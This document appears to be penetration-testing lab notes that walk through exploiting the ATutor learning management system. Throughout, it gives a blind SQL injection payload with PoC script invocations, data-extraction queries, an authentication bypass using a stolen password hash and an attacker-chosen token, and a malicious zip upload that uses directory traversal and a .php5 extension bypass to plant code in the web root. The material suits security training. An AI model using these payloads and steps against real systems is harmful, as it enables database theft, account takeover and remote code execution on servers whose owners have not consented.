Search for vulnerabilities in unauthenticated flow
Determine inference-based SQL injection
Determine failure of input sanitization
Locate authentication bypass issue
Extract password hash to bypass authentication
Create and upload malicious zip file
Use grep to locate source of error message
```bash (database logging for MySQL)
sudo nano /etc/mysql/my.cnf   # under [mysqld] set general_log = 1 and general_log_file = /var/log/mysql/mysql.log (lab only: the general log records every statement, credentials included)
sudo systemctl restart mysql
sudo tail -f /var/log/mysql/mysql.log   # watch the injected queries arrive as the payloads below are sent
```bash (php display errors)
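sudo nano /etc/php5/apache2/php.ini   # set display_errors = On in the [PHP] section (it is an ini directive, not a shell command; php.ini comments use ';')
# lab/white-box only: display_errors sends file paths and stack detail to every client, which is what the path-disclosure step of the traversal attack relies on
sudo systemctl restart apache2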
```bash (unauthenticated flow)
grep -rnw /var/www/html/ATutor -e '^.user_location.public.' --color
grep -rnw /var/www/html/ATutor -e 'function searchFriends' --color
grep -rnw /var/www/html/ATutor -e '$addslashes.=' --color   # single quotes matter: in double quotes the shell expands $addslashes to nothing, leaving the pattern .= which matches almost every line
# BeautifulSoup with the lxml XML parser for the PoC scripts (or fall back to the built-in html.parser)
pip install bs4 lxml ``` Inference-based SQL Injection ```php
# improper use of $addslashes input validation
if ( get_magic_quotes_gpc() == 1 ) {} # magic quotes were the legacy escaping mechanism: deprecated in PHP 5.3.0, removed in 5.4.0 (get_magic_quotes_gpc() always returns false there) and off by default before that, so this branch is a no-op on any current install
$addslashes = 'trim'; # temporary hack: trim() only strips leading/trailing whitespace, so quotes and comment sequences reach the query untouched
# improper use of parameterization
$sql = create_sql($query, $params, $sanitize); # in queryDB(), $sanitize params but not string concatenated query string
# bypassing string explode
$sub_names = explode(' ', $name); # splitting on spaces is not sanitization: use inline comments /**/ as the separator so the payload survives intact ``` ```bash
# URL-encode characters the HTTP layer would otherwise interpret, e.g. # (%23, would end the URL) and ? (%3F), before placing the payload in the query string
python ATutor-1.py 192.168.127.103 "off')/**/OR/**/(SELECT/**/1)=0%23" # initial payload
python ATutor-2.py 192.168.127.103 # verify boolean based sqli
python ATutor-3.py 192.168.127.103 # enumerate mysql version ``` Extract Sensitive Information ```sql
select/**/version();
select/**/(substring((select/**/version()),1,1))='4'; # boolean based TRUE/FALSE: one bit of information per request
select/**/ascii(substring((select/**/version()),1,1))='52'; # ascii - printable set 32 - 126; comparing with > instead of = allows a binary search (about 7 requests per character instead of up to 95)
select user from (select user() as user UNION ALL SELECT replace(grantee,'\'','') as user FROM information_schema.user_privileges WHERE privilege_type = "super") temp group by user having count(*) > 1; # retrieve dba
select count(*) from (SELECT replace(grantee,'\'','') as user FROM information_schema.user_privileges WHERE privilege_type = "super" UNION select user() as user) temp group by user; ``` Authentication Bypass ```php
# search for login functionality in login.php and login_functions.inc.php
$_SESSION['token'] = $_POST['token']; # the per-login salt is copied straight from the request, so the client (attacker) chooses it instead of the server
WHERE (login='$this_login' OR email='$this_login') AND SHA1(CONCAT(password,$_SESSION['token']))='$this_password' # the check is SHA1(stored_hash . token); once the hash is extracted both inputs are attacker-known
function encrypt_password() {
document.form.form_password_hidden.value = hex_sha1(hex_sha1(document.form.form_password.value) + "<?php echo $_SESSION['token']; ?>"); ...} # the browser hashes the cleartext once and then again with the token; the DB stores only the single SHA1, so with the extracted hash and a chosen token the attacker computes sha1(hash + token) directly and never needs the cleartext ``` Malicious Zip File Upload ```bash
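grep -ir "IMS manifest file is missing" /var/www/html/ATutor --color   # locate the user-visible error message (-i: case-insensitive, since the UI string may be capitalised differently)
grep -ir "addError(" /var/www/html/ATutor --color                       # list the error types the upload handler can raise
grep -rnw /var/www/html/ATutor -e "NO_IMSMANIFEST" --color              # find the check in code and adjust the zip payload so it passes
# use zipfile and cStringIO => StringIO to create python poc
sudo find / -name poc.txt 2>/dev/null   # observe where the extracted file landed; 2>/dev/null hides /proc and permission noise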
sudo find / -name poc.php5 # bypass of the extension filter: .php5 only executes if the Apache/PHP handler config maps that extension to PHP (check the AddHandler/AddType lines for php5 before relying on it) ``` Directory Traversal ```php
z.writestr('../../../../../tmp/poc/poc.txt', 'offsec') # Python zipfile, not PHP: the '../' sequences live in the archive entry name, so the write escapes the extraction directory only if the server-side extractor does not normalize entry names; /tmp is used first because it is writable regardless of web-root permissions
# trigger a php error warning (through display_errors) in black box to disclose web root, then replace /tmp with the disclosed path ``` ```bash
find /var/www/html/ -type d -perm -o+w # find world-writable directories in web root
# -o+w only catches world-writable dirs; what the upload actually needs is a dir writable by the web server account, e.g. sudo -u www-data find /var/www/html/ -type d -writable (www-data on Debian/Ubuntu Apache) ```
